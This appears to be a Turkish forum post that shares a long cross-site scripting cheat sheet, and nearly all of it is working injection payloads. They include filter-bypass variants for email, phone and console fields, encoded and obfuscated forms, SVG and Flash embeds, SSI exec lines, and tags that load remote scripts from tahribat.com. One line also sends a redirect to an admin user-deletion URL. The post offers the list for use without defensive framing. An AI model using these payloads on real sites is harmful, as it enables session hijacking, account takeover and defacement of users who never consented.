

XSS(Cross Site Scripting) Strings
-
Umarım işinize yarar arkaşlar Güzel bir xss kaynağı değerlendirmesini bilene
http://ha.ckers.org/xss.html buradan gerekli bilgiyi alabilirsiniz bu konuda daha detaylı kodları ise aşşağıda belirteceğim biraz uzun umarım işinize yarar<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> <SCRIPT>document.cookie=true;</SCRIPT> <IMG SRC="jav ascript:document.cookie=true;"> <IMG SRC="javascript:document.cookie=true;"> <IMG SRC="  javascript:document.cookie=true;"> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> <SCRIPT>document.cookie=true;//<</SCRIPT> <SCRIPT <B>document.cookie=true;</SCRIPT> <IMG SRC="javascript:document.cookie=true;"> <iframe src="javascript:document.cookie=true;> <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> </TITLE><SCRIPT>document.cookie=true;</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> <BODY BACKGROUND="javascript:document.cookie=true;"> <BODY ONLOAD=document.cookie=true;> <IMG DYNSRC="javascript:document.cookie=true;"> <IMG LOWSRC="javascript:document.cookie=true;"> <BGSOUND SRC="javascript:document.cookie=true;"> <BR SIZE="&{document.cookie=true}"> <LAYER SRC="javascript:document.cookie=true;"></LAYER> <LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting ¼script¾document.cookie=true;¼/script¾ <IFRAME SRC="javascript:document.cookie=true;"></IFRAME> <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> <TABLE BACKGROUND="javascript:document.cookie=true;"> <TABLE><TD BACKGROUND="javascript:document.cookie=true;"> <DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <DIV STYLE="width: expression(document.cookie=true);"> <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> <STYLE TYPE="text/javascript">document.cookie=true;</STYLE> <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> <SCRIPT>document.cookie=true;</SCRIPT> <BASE HREF="javascript:document.cookie=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.cookie=true;"> <div onmouseover="document.cookie=true;"> <img src="javascript:document.cookie=true;"> <img dynsrc="javascript:document.cookie=true;"> <input type="image" dynsrc="javascript:document.cookie=true;"> <bgsound src="javascript:document.cookie=true;"> &<script>document.cookie=true;</script> &{document.cookie=true;}; <img src=&{document.cookie=true;};> <link rel="stylesheet" href="javascript:document.cookie=true;"> <img src="mocha:document.cookie=true;"> <img src="livescript:document.cookie=true;"> <a href="about:<script>document.cookie=true;</script>"> <body onload="document.cookie=true;"> <div style="background-image: url(javascript:document.cookie=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.cookie=true;);"> <style type="text/javascript">document.cookie=true;</style> <object classid="clsid:..." codebase="javascript:document.cookie=true;"> <style><!--</style><script>document.cookie=true;//--></script> <<script>document.cookie=true;</script> <script>document.cookie=true;//--></script> <!-- -- --><script>document.cookie=true;</script><!-- -- --> <img src="blah"onmouseover="document.cookie=true;"> <img src="blah>" onmouseover="document.cookie=true;"> <xml src="javascript:document.cookie=true;"> <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with close TAG: >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> >"<SCRIPT>document.cookie=true;</SCRIPT> >"<IMG SRC="jav ascript:document.cookie=true;"> >"<IMG SRC="javascript:document.cookie=true;"> >"<IMG SRC="  javascript:document.cookie=true;"> >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> >"<SCRIPT>document.cookie=true;//<</SCRIPT> >"<SCRIPT <B>document.cookie=true;</SCRIPT> >"<IMG SRC="javascript:document.cookie=true;"> >"<iframe src="javascript:document.cookie=true;> >"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT> >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> >"<BODY BACKGROUND="javascript:document.cookie=true;"> >"<BODY ONLOAD=document.cookie=true;> >"<IMG DYNSRC="javascript:document.cookie=true;"> >"<IMG LOWSRC="javascript:document.cookie=true;"> >"<BGSOUND SRC="javascript:document.cookie=true;"> >"<BR SIZE="&{document.cookie=true}"> >"<LAYER SRC="javascript:document.cookie=true;"></LAYER> >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting >"¼script¾document.cookie=true;¼/script¾ >"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME> >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> >"<TABLE BACKGROUND="javascript:document.cookie=true;"> >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;"> >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> >"<DIV STYLE="width: expression(document.cookie=true);"> >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> >"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> >"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> >"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> >"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> >"<SCRIPT>document.cookie=true;</SCRIPT> >"<BASE HREF="javascript:document.cookie=true;//"> >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> >"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> >"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >"<a href="javascript#document.cookie=true;"> >"<div onmouseover="document.cookie=true;"> >"<img src="javascript:document.cookie=true;"> >"<img dynsrc="javascript:document.cookie=true;"> >"<input type="image" dynsrc="javascript:document.cookie=true;"> >"<bgsound src="javascript:document.cookie=true;"> >"&<script>document.cookie=true;</script> >"&{document.cookie=true;}; >"<img src=&{document.cookie=true;};> >"<link rel="stylesheet" href="javascript:document.cookie=true;"> >"<img src="mocha:document.cookie=true;"> >"<img src="livescript:document.cookie=true;"> >"<a href="about:<script>document.cookie=true;</script>"> >"<body onload="document.cookie=true;"> >"<div style="background-image: url(javascript:document.cookie=true;);"> >"<div style="behaviour: url([link to code]);"> >"<div style="binding: url([link to code]);"> >"<div style="width: expression(document.cookie=true;);"> >"<style type="text/javascript">document.cookie=true;</style> >"<object classid="clsid:..." codebase="javascript:document.cookie=true;"> >"<style><!--</style><script>document.cookie=true;//--></script> >"<<script>document.cookie=true;</script> >"<script>document.cookie=true;//--></script> >"<!-- -- --><script>document.cookie=true;</script><!-- -- --> >"<img src="blah"onmouseover="document.cookie=true;"> >"<img src="blah>" onmouseover="document.cookie=true;"> >"<xml src="javascript:document.cookie=true;"> >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with negative value & TAG: -1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> -1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> -1<SCRIPT>document.cookie=true;</SCRIPT> -1<IMG SRC="jav ascript:document.cookie=true;"> -1<IMG SRC="javascript:document.cookie=true;"> -1<IMG SRC="  javascript:document.cookie=true;"> -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> -1<SCRIPT>document.cookie=true;//<</SCRIPT> -1<SCRIPT <B>document.cookie=true;</SCRIPT> -1<IMG SRC="javascript:document.cookie=true;"> -1<iframe src="javascript:document.cookie=true;> -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT> -1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> -1<BODY BACKGROUND="javascript:document.cookie=true;"> -1<BODY ONLOAD=document.cookie=true;> -1<IMG DYNSRC="javascript:document.cookie=true;"> -1<IMG LOWSRC="javascript:document.cookie=true;"> -1<BGSOUND SRC="javascript:document.cookie=true;"> -1<BR SIZE="&{document.cookie=true}"> -1<LAYER SRC="javascript:document.cookie=true;"></LAYER> -1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> -1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting -1¼script¾document.cookie=true;¼/script¾ -1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME> -1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> -1<TABLE BACKGROUND="javascript:document.cookie=true;"> -1<TABLE><TD BACKGROUND="javascript:document.cookie=true;"> -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> -1<DIV STYLE="width: expression(document.cookie=true);"> -1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> -1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> -1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> -1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> -1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> -1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> -1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> -1<SCRIPT>document.cookie=true;</SCRIPT> -1<BASE HREF="javascript:document.cookie=true;//"> -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> -1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> -1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> -1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> -1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- -1<a href="javascript#document.cookie=true;"> -1<div onmouseover="document.cookie=true;"> -1<img src="javascript:document.cookie=true;"> -1<img dynsrc="javascript:document.cookie=true;"> -1<input type="image" dynsrc="javascript:document.cookie=true;"> -1<bgsound src="javascript:document.cookie=true;"> -1&<script>document.cookie=true;</script> -1&{document.cookie=true;}; -1<img src=&{document.cookie=true;};> -1<link rel="stylesheet" href="javascript:document.cookie=true;"> -1<img src="mocha:document.cookie=true;"> -1<img src="livescript:document.cookie=true;"> -1<a href="about:<script>document.cookie=true;</script>"> -1<body onload="document.cookie=true;"> -1<div style="background-image: url(javascript:document.cookie=true;);"> -1<div style="behaviour: url([link to code]);"> -1<div style="binding: url([link to code]);"> -1<div style="width: expression(document.cookie=true;);"> -1<style type="text/javascript">document.cookie=true;</style> -1<object classid="clsid:..." codebase="javascript:document.cookie=true;"> -1<style><!--</style><script>document.cookie=true;//--></script> -1<<script>document.cookie=true;</script> -1<script>document.cookie=true;//--></script> -1<!-- -- --><script>document.cookie=true;</script><!-- -- --> -1<img src="blah"onmouseover="document.cookie=true;"> -1<img src="blah>" onmouseover="document.cookie=true;"> -1<xml src="javascript:document.cookie=true;"> -1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> -1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings Restriction Bypass Mail: >"<iframe src=http://tahribat.com/>@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com >"<script>alert(document.cookie)</script>@gmail.com <iframe src=http://tahribat.com/>@gmail.com <script>alert(document.cookie)</script><div style="1@gmail.com <script>alert(document.cookie)</script>@gmail.com Cross Site Scripting Strings Restriction Bypass Phone: +49/>"<iframe src=http://tahribat.com>1337 "><iframe src='' onload=alert('mphone')> <iframe src=http://tahribat.com>1337+1 Cross Site Scripting Strings Restriction Bypass Obfuscation >“<ScriPt>ALeRt("VlAb")</scriPt> >"<IfRaMe sRc=http://tahribat.com></IfRaMe> Cross Site Scripting Strings Restriction Bypass String to Charcode <html><body> <button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108, 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr om.Char.Code</button></body></html> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT> '';!--"<CrossSiteScripting>=&{()} Cross Site Scripting Strings Restriction Bypass encoded frame url %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F %73%63%72%69%70%74%3E Cross Site Scripting Strings via Console: set vlan name 1337 <script>alert(document.cookie)</script> set system name <iframe src=http://tahribat.com> set system location "><iframe src=a onload=alert("VL") < set system contact <script>alert('VL')</script> insert <script>alert(document.cookie)</script> add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://tahribat.com/CrossSiteScripting.js></SCRIPT>'"--> add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com add topic <iframe src=http://tahribat.com> add name <script>alert('VL')</script> perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out <!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]--> Cross Site Scripting Strings on per line validation applications: <IMG SRC = " j a v a s c r i p t : a l e r t ( ' V L A B ' ) " > Cross Site Scripting Strings Embed: <EMBED SRC="http://tahribat.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> Cross Site Scripting Strings Action Script: <object type="application/x-shockwave-flash" data="http://tahribat.com/hack.swf" width="300" height="300"> <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" /> <param name="quality" value="high" /> <param name="scale" value="noscale" /> <param name="salign" value="LT" /> <param name="allowScriptAccess" value="always" /> <param name="menu" value="false" /> </object> <SCRIPT SRC=http://tahribat.com/CrossSiteScripting.js></SCRIPT> <<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT> <SCRIPT SRC=http://tahribat.com/CrossSiteScripting.js?<B> <SCRIPT SRC=//vulnerability-lab.com/.js> <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT> <SCRIPT a=">" SRC="http://tahribat.com/CrossSiteScripting.js"></SCRIPT> <SCRIPT a=`>` SRC="http://tahribat.com/CrossSiteScripting.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://tahribat.com/CrossSiteScripting.js"></SCRIPT> </TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT> <IMG SRC="javascript:alert('CrossSiteScripting');"> <IMG SRC=javascript:alert('CrossSiteScripting')> <IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')> <IMG SRC=javascript:alert("CrossSiteScripting")> <IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`> <IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('CrossSiteScripting');"> <IMG SRC="jav	ascript:alert('CrossSiteScripting');"> <IMG SRC="jav
ascript:alert('CrossSiteScripting');"> <IMG SRC="jav
ascript:alert('CrossSiteScripting');"> <IMG SRC="  javascript:alert('CrossSiteScripting');"> <IMG SRC="javascript:alert('CrossSiteScripting')" <IMG DYNSRC="javascript:alert('CrossSiteScripting')"> <IMG LOWSRC="javascript:alert('CrossSiteScripting')"> <IMG SRC='vbscript:msgbox("CrossSiteScripting")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');"> <META HTTP-EQUIV="Link" Content="<http://tahribat.com/CrossSiteScripting.css>; REL=stylesheet"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4- <OBJECT TYPE="text/x-scriptlet" DATA="http://tahribat.com/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT> <STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE> <STYLE>@import'http://tahribat.com/CrossSiteScripting.css';</STYLE> <STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE> <STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A> <STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE> <STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting <STYLE>BODY{-moz-binding:url("http://tahribat.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE> <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))"> <DIV STYLE="width: expression(alert('CrossSiteScripting'));"> <LAYER SRC="http://tahribat.com/script.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');"> <LINK REL="stylesheet" HREF="http://tahribat.com/CrossSiteScripting.css"> <BODY BACKGROUND="javascript:alert('CrossSiteScripting')"> <BODY ONLOAD=alert('CrossSiteScripting')> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")> <iframe src=http://tahribat.com/index.html < <TABLE BACKGROUND="javascript:alert('CrossSiteScripting')"> <TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')"> <BGSOUND SRC="javascript:alert('CrossSiteScripting');"> <BR SIZE="&{alert('CrossSiteScripting')}"> <A HREF="http://server.com/">CrossSiteScripting</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A> <A HREF="http://1113982867/">CrossSiteScripting</A> <A HREF="javascript:document.location='http://tahribat.com/'">CrossSiteScripting</A> <BASE HREF="javascript:alert('CrossSiteScripting');//"> \";alert('CrossSiteScripting');// <INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');"> <CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);"> ¼script¾alert(¢CrossSiteScripting¢)¼/script¾ <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))"> <CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*"); CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'> a="get"; b="URL(\""; c="javascript:"; d="alert('CrossSiteScripting');\")"; eval(v+l+a+b); <HTML xmlns:CrossSiteScripting> <?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc"> <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"></B></I></XML> <SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>"> </BODY></HTML> <SCRIPT SRC="http://tahribat.com/CrossSiteScripting.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://tahribat.com/CrossSiteScripting.js></SCRIPT>'"--> <? echo('<SCR)'; echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?> <IMG SRC="http://tahribat.com/file.php?variables=malicious"> Redirect 302 /vlab.jpg http://tahribat.com/admin.asp&deleteuser %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E <iframe src=http://test.de> <iframe src=http://test.de> PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+ -
Firefox, Hack Bar eklentisini edinirseniz XSS için encoding, decoding falan yapmak oldukça basitleşecektir.
Toplam Hit: 1501 Toplam Mesaj: 2